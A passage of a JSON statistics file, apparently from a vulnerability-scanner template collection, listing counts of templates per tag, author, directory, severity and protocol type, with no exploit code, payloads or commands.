ule-ee","count":1},{"name":"dnn","count":1},{"name":"yachtcontrol","count":1},{"name":"ntopng","count":1},{"name":"nownodes","count":1},{"name":"twitter-server","count":1},{"name":"alquist","count":1},{"name":"hrsale","count":1},{"name":"secmail","count":1},{"name":"salesforce","count":1},{"name":"natemail","count":1},{"name":"crestron","count":1},{"name":"vscode","count":1},{"name":"opensso","count":1},{"name":"youtube","count":1},{"name":"mx","count":1},{"name":"floc","count":1},{"name":"tor","count":1},{"name":"gilacms","count":1},{"name":"wix","count":1},{"name":"wavlink","count":1},{"name":"webex","count":1},{"name":"chevereto","count":1},{"name":"apollo","count":1},{"name":"cofax","count":1},{"name":"argussurveillance","count":1},{"name":"api-manager","count":1},{"name":"europeana","count":1},{"name":"prototype","count":1},{"name":"web3storage","count":1},{"name":"radius","count":1},{"name":"books","count":1},{"name":"appweb","count":1},{"name":"graylog","count":1},{"name":"hortonworks","count":1},{"name":"webalizer","count":1},{"name":"cherokee","count":1},{"name":"mozilla","count":1},{"name":"scimono","count":1},{"name":"fortilogger","count":1},{"name":"email","count":1},{"name":"mongoshake","count":1},{"name":"pihole","count":1},{"name":"holidayapi","count":1},{"name":"nc2","count":1},{"name":"okiko","count":1},{"name":"directum","count":1},{"name":"mod-proxy","count":1},{"name":"geutebruck","count":1},{"name":"cloudron","count":1},{"name":"smuggling","count":1},{"name":"knowage","count":1},{"name":"vanguard","count":1},{"name":"dwr","count":1},{"name":"owa","count":1},{"name":"h2","count":1},{"name":"gofile","count":1},{"name":"accuweather","count":1},{"name":"qualcomm","count":1},{"name":"zenario","count":1},{"name":"password","count":1},{"name":"shortcode","count":1},{"name":"bazarr","count":1},{"name":"rijksmuseum","count":1},{"name":"fastcgi","count":1},{"name":"mdb","count":1},{"name":"geddy","count":1},{"name":"sso","count":1},{"name":"roundcube","count":1},{"name":"oneblog","count":1},{"name":"improvmx","count":1},{"name":"dribbble","count":1},{"name":"weboftrust","count":1},{"name":"pendo","count":1},{"name":"ninjaform","count":1},{"name":"gurock","count":1},{"name":"xmpp","count":1},{"name":"optiLink","count":1},{"name":"sast","count":1},{"name":"primefaces","count":1},{"name":"burp","count":1},{"name":"finereport","count":1},{"name":"coinapi","count":1},{"name":"episerver","count":1},{"name":"virustotal","count":1},{"name":"jumpcloud","count":1},{"name":"onelogin","count":1},{"name":"wiki","count":1},{"name":"eg","count":1},{"name":"ubnt","count":1},{"name":"wago","count":1},{"name":"softaculous","count":1},{"name":"ricoh","count":1},{"name":"remkon","count":1},{"name":"rsa","count":1},{"name":"monitorr","count":1},{"name":"timeclock","count":1},{"name":"seacms","count":1},{"name":"wowza","count":1},{"name":"kenesto","count":1},{"name":"spotify","count":1},{"name":"mantis","count":1},{"name":"meshcentral","count":1},{"name":"b2bbuilder","count":1},{"name":"jreport","count":1},{"name":"cscart","count":1},{"name":"ioncube","count":1},{"name":"iterable","count":1},{"name":"centreon","count":1},{"name":"logontracer","count":1},{"name":"kyocera","count":1},{"name":"aerohive","count":1},{"name":"xproxy","count":1},{"name":"richfaces","count":1},{"name":"bing","count":1},{"name":"dom","count":1},{"name":"sls","count":1},{"name":"esmtp","count":1},{"name":"activecollab","count":1},{"name":"exponentcms","count":1},{"name":"pirelli","count":1},{"name":"saml","count":1},{"name":"xiuno","count":1},{"name":"perl","count":1},{"name":"aniapi","count":1},{"name":"ptr","count":1},{"name":"alerta","count":1},{"name":"viewlinc","count":1},{"name":"opensns","count":1},{"name":"smartsheet","count":1},{"name":"stem","count":1},{"name":"ymhome","count":1},{"name":"appveyor","count":1},{"name":"xamr","count":1},{"name":"mara","count":1},{"name":"zend","count":1},{"name":"goanywhere","count":1},{"name":"loqate","count":1},{"name":"bingmaps","count":1},{"name":"details","count":1},{"name":"mofi","count":1},{"name":"charity","count":1},{"name":"nomad","count":1},{"name":"fiori","count":1},{"name":"rwebserver","count":1},{"name":"imap","count":1},{"name":"svn","count":1},{"name":"krweb","count":1},{"name":"playable","count":1},{"name":"cucm","count":1},{"name":"netrc","count":1},{"name":"livehelperchat","count":1},{"name":"opm","count":1},{"name":"mojoauth","count":1},{"name":"dropbox","count":1},{"name":"intellislot","count":1},{"name":"tink","count":1},{"name":"taiga","count":1},{"name":"iconfinder","count":1},{"name":"getgrav","count":1},{"name":"zeppelin","count":1},{"name":"visualstudio","count":1},{"name":"okta","count":1},{"name":"nette","count":1},{"name":"lantronix","count":1},{"name":"realteo","count":1},{"name":"axxonsoft","count":1},{"name":"emby","count":1},{"name":"yealink","count":1},{"name":"twig","count":1},{"name":"apple","count":1},{"name":"totolink","count":1},{"name":"cx","count":1},{"name":"tika","count":1},{"name":"ruckus","count":1},{"name":"nordex","count":1},{"name":"soar","count":1},{"name":"objectinjection","count":1},{"name":"purestorage","count":1},{"name":"alfresco","count":1},{"name":"hanwang","count":1},{"name":"adafruit","count":1},{"name":"extreme","count":1},{"name":"siemens","count":1},{"name":"guppy","count":1},{"name":"fastapi","count":1},{"name":"fuelcms","count":1},{"name":"acme","count":1},{"name":"keenetic","count":1},{"name":"phpwiki","count":1},{"name":"nsasg","count":1},{"name":"tcexam","count":1},{"name":"idemia","count":1},{"name":"kindeditor","count":1},{"name":"ocs-inventory","count":1},{"name":"moin","count":1},{"name":"festivo","count":1},{"name":"simplecrm","count":1},{"name":"buttercms","count":1},{"name":"pcoip","count":1},{"name":"microcomputers","count":1},{"name":"solarlog","count":1},{"name":"malshare","count":1},{"name":"mautic","count":1},{"name":"extractor","count":1},{"name":"trello","count":1},{"name":"vercel","count":1},{"name":"edgemax","count":1},{"name":"hiboss","count":1},{"name":"mediumish","count":1},{"name":"dvr","count":1},{"name":"ipstack","count":1},{"name":"xunchi","count":1},{"name":"hiawatha","count":1},{"name":"crm","count":1},{"name":"kerbynet","count":1},{"name":"distance","count":1},{"name":"myanimelist","count":1},{"name":"gateone","count":1},{"name":"goahead","count":1},{"name":"daybyday","count":1},{"name":"openerp","count":1},{"name":"expose","count":1},{"name":"cerebro","count":1},{"name":"argocd","count":1},{"name":"limit","count":1},{"name":"portal","count":1},{"name":"froxlor","count":1},{"name":"browserless","count":1},{"name":"commscope","count":1},{"name":"sourcecodester","count":1},{"name":"tracer","count":1},{"name":"office365","count":1},{"name":"addpac","count":1},{"name":"whm","count":1},{"name":"pyramid","count":1},{"name":"jeewms","count":1},{"name":"omi","count":1},{"name":"bible","count":1},{"name":"webui","count":1},{"name":"fhem","count":1},{"name":"xml","count":1},{"name":"securepoint","count":1},{"name":"myvuehelp","count":1},{"name":"tectuus","count":1},{"name":"streetview","count":1},{"name":"box","count":1},{"name":"clave","count":1},{"name":"lacie","count":1},{"name":"wazuh","count":1},{"name":"rdp","count":1},{"name":"opentsdb","count":1},{"name":"feifeicms","count":1},{"name":"cyberoam","count":1},{"name":"prismaweb","count":1},{"name":"zm","count":1},{"name":"comfortel","count":1},{"name":"covalent","count":1},{"name":"weglot","count":1},{"name":"luftguitar","count":1},{"name":"phpfusion","count":1},{"name":"etouch","count":1},{"name":"octobercms","count":1},{"name":"hivemanager","count":1},{"name":"gsoap","count":1},{"name":"kubeflow","count":1},{"name":"billquick","count":1},{"name":"secret","count":1},{"name":"sco","count":1},{"name":"htmli","count":1},{"name":"redhat","count":1},{"name":"netgenie","count":1},{"name":"prestahome","count":1},{"name":"gocron","count":1},{"name":"glowroot","count":1},{"name":"shoppable","count":1},{"name":"mrtg","count":1},{"name":"clusterengine","count":1},{"name":"monitorix","count":1},{"name":"oscommerce","count":1},{"name":"sterling","count":1},{"name":"ddownload","count":1},{"name":"synnefo","count":1},{"name":"gstorage","count":1},{"name":"jenkin","count":1},{"name":"asus","count":1},{"name":"saltapi","count":1},{"name":"cybrotech","count":1},{"name":"bolt","count":1},{"name":"cliniccases","count":1},{"name":"jabber","count":1},{"name":"eprints","count":1},{"name":"maxsite","count":1},{"name":"smi","count":1},{"name":"plone","count":1},{"name":"webpconverter","count":1},{"name":"issabel","count":1},{"name":"dubbo","count":1},{"name":"servicedesk","count":1},{"name":"antsword","count":1},{"name":"karel","count":1},{"name":"urlscan","count":1},{"name":"calendly","count":1},{"name":"xdcms","count":1},{"name":"phabricator","count":1},{"name":"faraday","count":1},{"name":"acemanager","count":1},{"name":"cve2004","count":1},{"name":"weiphp","count":1},{"name":"metinfo","count":1},{"name":"shadoweb","count":1},{"name":"bravenewcoin","count":1},{"name":"blockchain","count":1},{"name":"ecosys","count":1},{"name":"cname","count":1},{"name":"doh","count":1},{"name":"nuxeo","count":1},{"name":"shopxo","count":1},{"name":"sofneta","count":1},{"name":"find","count":1},{"name":"smartsense","count":1},{"name":"spf","count":1},{"name":"phoronix","count":1},{"name":"sunflower","count":1},{"name":"rmc","count":1},{"name":"esxi","count":1},{"name":"nutanix","count":1},{"name":"labtech","count":1},{"name":"tuxedo","count":1},{"name":"tinypng","count":1},{"name":"timezone","count":1},{"name":" default-login","count":1},{"name":"micro","count":1},{"name":"sqlite","count":1},{"name":"database","count":1},{"name":"pulsesecure","count":1},{"name":"jnoj","count":1},{"name":"k8","count":1},{"name":"diris","count":1},{"name":"wdja","count":1},{"name":"idera","count":1},{"name":"abstractapi","count":1},{"name":"fedora","count":1},{"name":"bash","count":1},{"name":"nimble","count":1},{"name":"xvr","count":1},{"name":"bhagavadgita","count":1},{"name":"kyan","count":1},{"name":"eventtickets","count":1},{"name":"expressjs","count":1},{"name":"launchdarkly","count":1},{"name":"myucms","count":1},{"name":"cobub","count":1},{"name":"lg-nas","count":1},{"name":"tensorboard","count":1},{"name":"spectracom","count":1},{"name":"announcekit","count":1},{"name":"fontawesome","count":1},{"name":"idor","count":1},{"name":"identityguard","count":1},{"name":"coinlayer","count":1},{"name":"calendarific","count":1},{"name":"moinmoin","count":1},{"name":"elevation","count":1},{"name":"rackn","count":1},{"name":"elementor","count":1},{"name":"ewebs","count":1},{"name":"yishaadmin","count":1},{"name":"mailboxvalidator","count":1},{"name":"avalanche","count":1},{"name":"sceditor","count":1},{"name":"tarantella","count":1},{"name":"olivetti","count":1},{"name":"planon","count":1},{"name":"st","count":1},{"name":"interlib","count":1},{"name":"avtech","count":1},{"name":"speed","count":1},{"name":"phalcon","count":1},{"name":"wondercms","count":1},{"name":"trilithic","count":1},{"name":"dicoogle","count":1},{"name":"chinaunicom","count":1},{"name":"fanwei","count":1},{"name":"zoomsounds","count":1},{"name":"lutron","count":1},{"name":"landrayoa","count":1},{"name":"apiman","count":1},{"name":"solman","count":1},{"name":"noptin","count":1},{"name":"javafaces","count":1},{"name":"wordcloud","count":1},{"name":"xmlchart","count":1},{"name":"csrfguard","count":1},{"name":"etherpad","count":1},{"name":"superwebmailer","count":1},{"name":"etherscan","count":1},{"name":"ns","count":1},{"name":"grails","count":1},{"name":"acontent","count":1},{"name":"nexusdb","count":1},{"name":"txt","count":1},{"name":"openresty","count":1},{"name":"ueditor","count":1},{"name":"amcrest","count":1},{"name":"micro-user-service","count":1},{"name":"ametys","count":1},{"name":"formalms","count":1},{"name":"open-redirect","count":1},{"name":"code42","count":1},{"name":"atvise","count":1},{"name":"slstudio","count":1},{"name":"ignition","count":1},{"name":"checkmarx","count":1},{"name":"redmine","count":1},{"name":"sage","count":1},{"name":"tinymce","count":1},{"name":"lotuscms","count":1},{"name":"asanhamayesh","count":1},{"name":"ucp","count":1},{"name":"lancom","count":1},{"name":"siteomat","count":1},{"name":"rubedo","count":1},{"name":"jeecg-boot","count":1},{"name":"alltube","count":1},{"name":"cloudflare","count":1},{"name":"hetzner","count":1},{"name":"drone","count":1},{"name":"threatq","count":1},{"name":"cooperhewitt","count":1},{"name":"tieline","count":1},{"name":"smartblog","count":1},{"name":"comodo","count":1},{"name":"postmark","count":1},{"name":"fortigates","count":1},{"name":"whmcs","count":1},{"name":"ilo4","count":1},{"name":"console","count":1},{"name":"flask","count":1},{"name":"clink-office","count":1},{"name":"shiro","count":1},{"name":"mastodon","count":1},{"name":"stytch","count":1},{"name":"jenzabar","count":1},{"name":"spip","count":1},{"name":"magicflow","count":1},{"name":"darkstat","count":1},{"name":"concrete5","count":1},{"name":"wavemaker","count":1},{"name":"gerapy","count":1},{"name":"dbeaver","count":1},{"name":"adminset","count":1},{"name":"kodi","count":1},{"name":"oliver","count":1},{"name":"starttls","count":1},{"name":"szhe","count":1},{"name":"axiom","count":1},{"name":"octoprint","count":1},{"name":"icinga","count":1},{"name":"pivotaltracker","count":1},{"name":"meraki","count":1},{"name":"kvm","count":1},{"name":"teltonika","count":1},{"name":"mongo-express","count":1},{"name":"gloo","count":1},{"name":"sitefinity","count":1},{"name":"vsftpd","count":1},{"name":"quip","count":1},{"name":"dwsync","count":1},{"name":"websvn","count":1},{"name":"kodexplorer","count":1},{"name":"eyou","count":1},{"name":"alertmanager","count":1},{"name":"gunicorn","count":1},{"name":"robomongo","count":1},{"name":"memcached","count":1},{"name":"rsyncd","count":1},{"name":"digitalrebar","count":1},{"name":"onkyo","count":1},{"name":"tpshop","count":1},{"name":"catfishcms","count":1},{"name":"adiscon","count":1},{"name":"ulterius","count":1},{"name":"primetek","count":1},{"name":"socomec","count":1},{"name":"swagger","count":1},{"name":"discord","count":1},{"name":"oki","count":1},{"name":"wallix","count":1},{"name":"huijietong","count":1},{"name":"snipeit","count":1},{"name":"slocum","count":1},{"name":"clockwork","count":1},{"name":"upnp","count":1},{"name":"triconsole","count":1},{"name":"ncomputing","count":1},{"name":"shoretel","count":1},{"name":"loganalyzer","count":1},{"name":"malwarebazaar","count":1},{"name":"mtheme","count":1},{"name":"processmaker","count":1},{"name":"portainer","count":1},{"name":"short.io","count":1},{"name":"postgres","count":1},{"name":"basic-auth","count":1},{"name":"gsm","count":1},{"name":"seowon","count":1},{"name":"visionhub","count":1},{"name":"dbt","count":1},{"name":"huemagic","count":1},{"name":"pollbot","count":1},{"name":"paneil","count":1},{"name":"cve2021wordpress","count":1},{"name":"aspnuke","count":1},{"name":"mariadb","count":1},{"name":"landray","count":1},{"name":"web-suite","count":1},{"name":"cors","count":1},{"name":"emerson","count":1},{"name":"pippoint","count":1},{"name":"cse","count":1},{"name":"ldap","count":1},{"name":"oidc","count":1},{"name":"activeadmin","count":1},{"name":"petfinder","count":1},{"name":"cves2001","count":1},{"name":"trane","count":1},{"name":"adoptapet","count":1},{"name":"tensorflow","count":1},{"name":"webftp","count":1},{"name":"erp-nc","count":1},{"name":"binance","count":1},{"name":"place","count":1},{"name":"block","count":1},{"name":"biometrics","count":1},{"name":"oauth2","count":1},{"name":"maccmsv10","count":1},{"name":"bitquery","count":1},{"name":"thedogapi","count":1},{"name":"iceflow","count":1},{"name":"yzmcms","count":1},{"name":"sauter","count":1},{"name":"adfs","count":1},{"name":"nearby","count":1},{"name":"openweather","count":1},{"name":"webctrl","count":1},{"name":"barracuda","count":1},{"name":"totaljs","count":1},{"name":"svnserve","count":1},{"name":"allied","count":1},{"name":"yopass","count":1},{"name":"klog","count":1},{"name":"thecatapi","count":1},{"name":"pagerduty","count":1},{"name":"bitrise","count":1},{"name":"eyoucms","count":1},{"name":"buildkite","count":1},{"name":"bookstack","count":1},{"name":"emessage","count":1},{"name":"dotcms","count":1},{"name":"piwigo","count":1},{"name":"newsletter","count":1},{"name":"74cms","count":1},{"name":"qdpm","count":1},{"name":"checkpoint","count":1},{"name":"cve2000","count":1},{"name":"haproxy","count":1},{"name":"instatus","count":1},{"name":"clickhouse","count":1},{"name":"tongda","count":1},{"name":"plc","count":1},{"name":"nweb2fax","count":1},{"name":"instagram","count":1},{"name":"sprintful","count":1},{"name":"ssltls","count":1},{"name":"qsan","count":1},{"name":"hdnetwork","count":1},{"name":"piluscart","count":1},{"name":"vidyo","count":1},{"name":"adb","count":1},{"name":"caddy","count":1},{"name":"beanstalk","count":1},{"name":"mdm","count":1},{"name":"abuseipdb","count":1},{"name":"rudloff","count":1},{"name":"supervisor","count":1},{"name":"iucn","count":1},{"name":"dotclear","count":1},{"name":"edgeos","count":1},{"name":"emlog","count":1},{"name":"commvault","count":1},{"name":"rmi","count":1},{"name":"codemeter","count":1},{"name":"kerio","count":1},{"name":"dnssec","count":1},{"name":"pypicloud","count":1},{"name":"turbocrm","count":1},{"name":"sgp","count":1},{"name":"ucs","count":1},{"name":"ecshop","count":1},{"name":"placeos","count":1},{"name":"lumis","count":1},{"name":"asana","count":1},{"name":"yarn","count":1},{"name":"scanii","count":1},{"name":"ganglia","count":1},{"name":"contentkeeper","count":1},{"name":"vsphere","count":1},{"name":"sarg","count":1},{"name":"opengear","count":1},{"name":"geolocation","count":1},{"name":"zarafa","count":1},{"name":"wakatime","count":1},{"name":"wing-ftp","count":1},{"name":"wildfly","count":1}],"authors":[{"name":"daffainfo","count":544},{"name":"dhiyaneshdk","count":406},{"name":"pikpikcu","count":313},{"name":"pdteam","count":255},{"name":"geeknik","count":174},{"name":"dwisiswant0","count":162},{"name":"0x_akoko","count":111},{"name":"gy741","count":108},{"name":"princechaddha","count":106},{"name":"pussycat0x","count":104},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"ffffffff0x","count":21},{"name":"righettod","count":17},{"name":"c-sh0","count":15},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"cckuailong","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":14},{"name":"idealphase","count":14},{"name":"suman_kar","count":12},{"name":"sullo","count":12},{"name":"r3dg33k","count":12},{"name":"cyllective","count":11},{"name":"melbadry9","count":11},{"name":"wdahlenb","count":11},{"name":"hackergautam","count":10},{"name":"meme-lord","count":10},{"name":"nadino","count":10},{"name":"random_robbie","count":10},{"name":"alph4byt3","count":10},{"name":"emadshanab","count":9},{"name":"adam crosser","count":9},{"name":"iamthefrogy","count":8},{"name":"johnk3r","count":8},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"logicalhunter","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"0x240x23elu","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"divya_mudgal","count":7},{"name":"kophjager007","count":7},{"name":"harshbothra_","count":7},{"name":"rootxharsh","count":6},{"name":"leovalcante","count":6},{"name":"caspergn","count":6},{"name":"forgedhallpass","count":6},{"name":"__fazal","count":6},{"name":"evan rubinstein","count":6},{"name":"iamnoooob","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"pathtaga","count":5},{"name":"joanbono","count":5},{"name":"elsfa7110","count":5},{"name":"lu4nx","count":5},{"name":"ganofins","count":5},{"name":"imnightmaree","count":5},{"name":"yanyun","count":5},{"name":"xelkomy","count":5},{"name":"panch0r3d","count":5},{"name":"_0xf4n9x_","count":5},{"name":"tess","count":4},{"name":"defr0ggy","count":4},{"name":"wisnupramoedya","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"dadevel","count":4},{"name":"andydoering","count":3},{"name":"me9187","count":3},{"name":"f1tz","count":3},{"name":"whoever","count":3},{"name":"_generic_human_","count":3},{"name":"dudez","count":3},{"name":"z3bd","count":3},{"name":"fyoorer","count":3},{"name":"shine","count":3},{"name":"sushantkamble","count":3},{"name":"arcc","count":3},{"name":"johnjhacking","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"lark-lab","count":3},{"name":"skeltavik","count":3},{"name":"impramodsargar","count":3},{"name":"jarijaas","count":3},{"name":"davidmckennirey","count":3},{"name":"r3naissance","count":3},{"name":"gitlab red team","count":3},{"name":"github.com/its0x08","count":3},{"name":"thomas_from_offensity","count":3},{"name":"0w4ys","count":3},{"name":"binaryfigments","count":3},{"name":"unstabl3","count":3},{"name":"emenalf","count":3},{"name":"alifathi-h1","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z0ne","count":2},{"name":"0xsapra","count":2},{"name":"bp0lr","count":2},{"name":"udit_thakkur","count":2},{"name":"bananabr","count":2},{"name":"dahse89","count":2},{"name":"foulenzer","count":2},{"name":"vavkamil","count":2},{"name":"k11h-de","count":2},{"name":"g4l1t0","count":2},{"name":"randomrobbie","count":2},{"name":"0xcrypto","count":2},{"name":"random-robbie","count":2},{"name":"paradessia","count":2},{"name":"mr-xn","count":2},{"name":"0xsmiley","count":2},{"name":"smaranchand","count":2},{"name":"kre80r","count":2},{"name":"cocxanh","count":2},{"name":"vsh00t","count":2},{"name":"amsda","count":2},{"name":"gevakun","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"r12w4n","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"lotusdll","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"w4cky_","count":2},{"name":"mohammedsaneem","count":2},{"name":"parth","count":2},{"name":"its0x08","count":2},{"name":"socketz","count":2},{"name":"bsysop","count":2},{"name":"zomsop82","count":2},{"name":"sy3omda","count":2},{"name":"cckuakilong","count":2},{"name":"gal nagli","count":2},{"name":"hetroublemakr","count":2},{"name":"y4er","count":2},{"name":"0xelkomy","count":2},{"name":"x1m_martijn","count":2},{"name":"martincodes-de","count":2},{"name":"ree4pwn","count":2},{"name":"moritz nentwig","count":2},{"name":"dheerajmadhukar","count":2},{"name":"supras","count":2},{"name":"huowuzhao","count":2},{"name":"0xrudra","count":2},{"name":"bing0o","count":2},{"name":"hahwul","count":2},{"name":"nvn1729","count":2},{"name":"danielmofer","count":2},{"name":"afaq","count":2},{"name":"ajaysenr","count":2},{"name":"joeldeleep","count":2},{"name":"fabaff","count":2},{"name":"sbani","count":2},{"name":"redteambrasil","count":2},{"name":"0xprial","count":2},{"name":"convisoappsec","count":2},{"name":"koti2","count":2},{"name":"pxmme1337","count":2},{"name":"bernardofsr","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"kiblyn11","count":2},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"andirrahmani1","count":1},{"name":"rotemreiss","count":1},{"name":"c3l3si4n","count":1},{"name":"patralos","count":1},{"name":"knassar702","count":1},{"name":"soyelmago","count":1},{"name":"udyz","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"jeya seelan","count":1},{"name":"exploitation","count":1},{"name":"notnotnotveg","count":1},{"name":"bad5ect0r","count":1},{"name":"thebinitghimire","count":1},{"name":"furkansenan","count":1},{"name":"aresx","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"charanrayudu","count":1},{"name":"jas37","count":1},{"name":"luci","count":1},{"name":"compr00t","count":1},{"name":"yavolo","count":1},{"name":"petruknisme","count":1},{"name":"manuelbua","count":1},{"name":"elouhi","count":1},{"name":"philippdelteil","count":1},{"name":"qlkwej","count":1},{"name":"coldfish","count":1},{"name":"chron0x","count":1},{"name":"hanlaomo","count":1},{"name":"hakluke","count":1},{"name":"dawid-czarnecki","count":1},{"name":"52971","count":1},{"name":"pudsec","count":1},{"name":"furkansayim","count":1},{"name":"alevsk","count":1},{"name":"adrianmf","count":1},{"name":"ok_bye_now","count":1},{"name":"evan rubinstien","count":1},{"name":"zinminphy0","count":1},{"name":"j33n1k4","count":1},{"name":"mah3sec_","count":1},{"name":"florianmaak","count":1},{"name":"ringo","count":1},{"name":"deena","count":1},{"name":"x6263","count":1},{"name":"harshinsecurity","count":1},{"name":"igibanez","count":1},{"name":"aaronchen0","count":1},{"name":"ldionmarcil","count":1},{"name":"retr0","count":1},{"name":"tim_koopmans","count":1},{"name":"andysvints","count":1},{"name":"orpheus","count":1},{"name":"mesaglio","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"infosecsanyam","count":1},{"name":"undefl0w","count":1},{"name":"0ut0fb4nd","count":1},{"name":"kaizensecurity","count":1},{"name":"edoardottt","count":1},{"name":"becivells","count":1},{"name":"rodnt","count":1},{"name":"thezakman","count":1},{"name":"dhiyaneshdki","count":1},{"name":"jbaines-r7","count":1},{"name":"0xd0ff9","count":1},{"name":"ggranjus","count":1},{"name":"th3.d1p4k","count":1},{"name":"ahmed abou-ela","count":1},{"name":"lark lab","count":1},{"name":"alperenkesk","count":1},{"name":"taielab","count":1},{"name":"jiheon-dev","count":1},{"name":"husain","count":1},{"name":"jrolf","count":1},{"name":"akash.c","count":1},{"name":"makyotox","count":1},{"name":"veshraj","count":1},{"name":"_darrenmartyn","count":1},{"name":"3th1c_yuk1","count":1},{"name":"toufik-airane","count":1},{"name":"un-fmunozs","count":1},{"name":"affix","count":1},{"name":"tirtha_mandal","count":1},{"name":"momen eldawakhly","count":1},{"name":"flag007","count":1},{"name":"shreyapohekar","count":1},{"name":"notsoevilweasel","count":1},{"name":"lethargynavigator","count":1},{"name":"anon-artist","count":1},{"name":"daviey","count":1},{"name":"official_blackhat13","count":1},{"name":"mubassirpatel","count":1},{"name":"streetofhackerr007","count":1},{"name":"shelld3v","count":1},{"name":"geraldino2","count":1},{"name":"myztique","count":1},{"name":"elder tao","count":1},{"name":"majidmc2","count":1},{"name":"luskabol","count":1},{"name":"jeya.seelan","count":1},{"name":"blckraven","count":1},{"name":"kailashbohara","count":1},{"name":"oscarintherocks","count":1},{"name":"mass0ma","count":1},{"name":"whynotke","count":1},{"name":"co0nan","count":1},{"name":"0xtavian","count":1},{"name":"ritikchaddha","count":1},{"name":"noamrathaus","count":1},{"name":"rubina119","count":1},{"name":"fq_hsu","count":1},{"name":"brenocss","count":1},{"name":"2rs3c","count":1},{"name":"ipanda","count":1},{"name":"shifacyclewla","count":1},{"name":"zsusac","count":1},{"name":"0xceba","count":1},{"name":"for3stco1d","count":1},{"name":"xshuden","count":1},{"name":"noobexploiter","count":1},{"name":"pdp","count":1},{"name":"thevillagehacker","count":1},{"name":"zhenwarx","count":1},{"name":"intx0x80","count":1},{"name":"luqman","count":1},{"name":"xstp","count":1},{"name":"berkdusunur","count":1},{"name":"h1ei1","count":1},{"name":"sshell","count":1},{"name":"cookiehanhoan","count":1},{"name":"s1r1u5_","count":1},{"name":"vzamanillo","count":1},{"name":"yuansec","count":1},{"name":"d0rkerdevil","count":1},{"name":"b0yd","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"osamahamad","count":1},{"name":"kiks7","count":1},{"name":"luqmaan hadia","count":1},{"name":"b4uh0lz","count":1},{"name":"juicypotato1","count":1},{"name":"mhdsamx","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"yashanand155","count":1},{"name":"kareemse1im","count":1},{"name":"apt-mirror","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"skylark-lab","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"micha3lb3n","count":1},{"name":"droberson","count":1},{"name":"willd96","count":1},{"name":"sec_hawk","count":1},{"name":"push4d","count":1},{"name":"nielsing","count":1},{"name":"narluin","count":1},{"name":"0xh7ml","count":1},{"name":"sickwell","count":1},{"name":"clarkvoss","count":1},{"name":"manasmbellani","count":1},{"name":"kurohost","count":1},{"name":"ooooooo_q","count":1},{"name":"_c0wb0y_","count":1},{"name":"wabafet","count":1},{"name":"hexcat","count":1},{"name":"nerrorsec","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ilovebinbash","count":1},{"name":"iampritam","count":1},{"name":"omarkurt","count":1},{"name":"borna nematzadeh","count":1},{"name":"revblock","count":1},{"name":"0xrod","count":1},{"name":"evolutionsec","count":1},{"name":"izn0u","count":1},{"name":"regala_","count":1},{"name":"ahmed sherif","count":1},{"name":"remonsec","count":1},{"name":"rojanrijal","count":1},{"name":"sicksec","count":1},{"name":"raesene","count":1},{"name":"jteles","count":1},{"name":"brabbit10","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"miroslavsotak","count":1},{"name":"ahmetpergamum","count":1},{"name":"bjhulst","count":1},{"name":"retr02332","count":1},{"name":"pratik khalane","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"0h1in9e","count":1},{"name":"absshax","count":1},{"name":"ohlinge","count":1},{"name":"ofjaaah","count":1},{"name":"b0rn2r00t","count":1},{"name":"akshansh","count":1},{"name":"zandros0","count":1},{"name":"kabirsuda","count":1},{"name":"alex","count":1},{"name":"elmahdi","count":1},{"name":"schniggie","count":1},{"name":"tea","count":1},{"name":"fmunozs","count":1},{"name":"exid","count":1},{"name":"_harleo","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"thesubtlety","count":1},{"name":"yashgoti","count":1},{"name":"twitter.com/dheerajmadhukar","count":1}],"directory":[{"name":"cves","count":1051},{"name":"exposed-panels","count":441},{"name":"vulnerabilities","count":417},{"name":"technologies","count":225},{"name":"exposures","count":199},{"name":"misconfiguration","count":188},{"name":"workflows","count":185},{"name":"token-spray","count":147},{"name":"default-logins","count":74},{"name":"takeovers","count":67},{"name":"file","count":57},{"name":"iot","count":36},{"name":"network","count":35},{"name":"miscellaneous","count":22},{"name":"cnvd","count":16},{"name":"dns","count":16},{"name":"fuzzing","count":11},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1064},{"name":"high","count":776},{"name":"medium","count":616},{"name":"critical","count":384},{"name":"low","count":171}],"types":[{"name":"http","count":2880},{"name":"file","count":57},{"name":"network","count":49},{"name":"dns","count":16}]} 